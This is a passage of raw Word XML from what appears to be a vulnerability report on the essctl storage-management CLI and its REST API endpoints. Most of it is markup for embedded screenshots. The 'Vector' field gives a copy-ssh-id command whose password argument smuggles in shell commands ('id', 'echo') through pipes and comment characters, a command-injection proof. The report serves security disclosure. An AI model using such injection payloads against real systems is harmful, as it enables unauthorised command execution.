                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6004059" cy="571690"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0568854E" wp14:editId="007F1AB5">
                  <wp:extent cx="5930900" cy="3196424"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1461039302" name="Drawing 20" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 20" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId60"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5932546" cy="3197311"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="367F9B49" wp14:editId="349B5871">
                  <wp:extent cx="5971430" cy="969645"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="276498573" name="Drawing 21" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 21" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId61"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6023377" cy="978080"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F9FACFE" wp14:editId="3C90AD2E">
                  <wp:extent cx="5928617" cy="2464904"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="978938873" name="Drawing 22" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 22" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId62"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943768" cy="2471203"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12421F44" wp14:editId="18EF88FD">
                  <wp:extent cx="5930900" cy="477079"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1770245831" name="Drawing 23" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 23" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId63"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6034958" cy="485449"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="228244EF" wp14:editId="2A40E0CC">
                  <wp:extent cx="5929630" cy="6806316"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1056937963" name="Drawing 24" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 24" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId64"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5934053" cy="6811393"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31D6DC1C" wp14:editId="5C967C1E">
                  <wp:extent cx="5930900" cy="898497"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="905891669" name="Drawing 25" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 25" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId65"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5977105" cy="905497"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AE98202" wp14:editId="205634D0">
                  <wp:extent cx="5930541" cy="6368994"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="26" name="Drawing 26" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 26" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId66"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5947845" cy="6387578"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26713144" wp14:editId="70047B79">
                  <wp:extent cx="5930900" cy="803082"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="27" name="Drawing 27" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 27" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId67"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5977918" cy="809449"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27B07EBB" wp14:editId="28A6C4D5">
                  <wp:extent cx="5930900" cy="5025224"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="28" name="Drawing 28" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 28" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId68"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5945051" cy="5037214"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D4522" w14:paraId="47D62CC1" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38F2F35C" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B6EE1B8" w14:textId="329BDD7F" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Most of the CLI arguments and API's parameters are vulnerable to this attack.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D4522" w14:paraId="63B160E5" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E7FCAF1" w14:textId="3CDD5419" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Affected </w:t>
            </w:r>
            <w:r w:rsidR="00A47D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>CLI</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>/API(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07996FCC" w14:textId="5A27BC23" w:rsidR="008D4522" w:rsidRDefault="0009119E" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="0009119E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CLI:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008D4522">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008D4522">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="008D4522">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008D4522">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>lpp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="008D4522">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008D4522">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>mmfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="008D4522">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008D4522">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>essctl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="24629C7C" w14:textId="7FDEB8D1" w:rsidR="008D4522" w:rsidRPr="005F76E2" w:rsidRDefault="005F76E2" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F76E2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>API Endpoints:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7619FD70" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://9.114.12.78:46443/sss/v3/copy_ssh_id</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E1C9AF6" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://9.114.12.78:46443/sss/v3/set_new_password_to_emsvm23e</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A71B127" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://9.114.12.78:46443/sss/v3/pull_new_sss_code</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46A5DA38" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://9.114.12.78:46443/sss/v3/pull_new_emsvm_script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D4522" w14:paraId="72363B27" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26DF2721" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Vector</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59ECF314" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>lpp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>mmfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>essctl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>essmgmt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> copy-ssh-id --hostname </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>utilityBareMetal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> --password </w:t>
            </w:r>
            <w:r w:rsidRPr="00B53687">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B53687">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>cluster|echo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B53687">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> test hello||a #' |id||a #|\" |echo </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B53687">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>dlqdofdsdq</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B53687">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8gorcmjfyy||a #"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> --username root --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>utilityBareMetal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> --insecure-skip-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>tls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>-verify</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D4522" w14:paraId="3B31ED33" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25882ECC" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
